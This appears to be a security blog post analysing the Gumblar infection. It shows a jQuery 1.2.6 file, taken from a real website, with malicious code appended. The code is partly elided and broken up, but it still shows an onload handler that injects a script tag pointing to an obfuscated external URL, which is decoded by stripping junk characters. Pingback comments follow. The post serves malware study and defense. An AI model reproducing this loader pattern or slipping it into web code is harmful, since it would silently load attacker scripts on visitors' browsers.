• When Benign scripts attack – V

    Building on with this series of posts, which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code. The malicious code displayed this time leads to the famous “Gumblar” infection strain and can cause a lot of headaches. This particular strain is not new, but has been resurfacing in the last few weeks and hence the focus on this specific piece.

    This particular example shows how a jQuery script was used by a hacker to spread malicious code. This example is a little obfuscated. This code was mined from www.i-movix.com/en/distributors/.

    On line 15 you can find:

    <scri pt type="text/javas cript" src="/plugins/system/ jceutilities/js/jqu ery-126.js">
    

    Which loads the example below:

    /*
    * jQuery 1.2.6 - New Wave Javascript
    *
    * Copyright (c) 2008 John Resig (jquery.com)
    * Dual licensed under the MIT (MIT-LICENSE.txt)
    * and GPL (GPL-LICENSE.txt) licenses.
    *
    * $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
    * $Rev: 5685 $
    */
    eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)
    >35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
    (c--)r[e(c)]=k||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}
    
    **code removed for brevity**
    
    while(c--)if(k)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k);return p}('(H
    (){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
    )+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){
    
    **malicious code**
    
    /*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
    ('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
    ('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
    )@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
    )n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
    0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
    m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
    )!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
    &!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
    \$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
    3ur6p);}} cat h(e) {}
    

    Till next time…

    • Please check my article for fixing this:

      http://ju stcod ed.c om/article/gu mblar-family-virus-removal-tool/

      Posted by Konstantin Boyko on December 24th

    • […] it seems that most of the forums which were hacked are using jQuery. This ties in well with our observations regarding jQuery scripts being used to push malware towards unsuspecting […]

      Posted by “Online Pharmacy” Spam stalks Internet Forums/Discussion Boards – StopTheHacker.com – Jaal, LLC. on January 26th

    • […] Only 0.63% of Joomla sites use jQuery.Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism. […]

      Posted by Analyzing Popular CMSs: Are Joomla Users at Risk? – StopTheHacker.com – Jaal, LLC. on February 1st

    • […] 44.4% of¬†WordPress sites which had Iframes were using JQuery. Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism. […]

      Posted by Analyzing Popular CMSs: Are WordPress Users at Risk? – StopTheHacker.com – Jaal, LLC. on February 2nd

    • […] post is going to show an example of a trend about which we blogged a few months ago. We are going to concentrate on the way hackers use “backup-sources” […]

      Posted by Hackers understand the value of backups! – stopthehacker.com – Jaal, LLC on May 4th

    • […] of a well known javascript framework used widely by developers: JQuery. In the past we have see hackers targeting JQuery, but in a slightly different […]

      Posted by Malware posing as Jquery – stopthehacker.com – Jaal, LLC on January 13th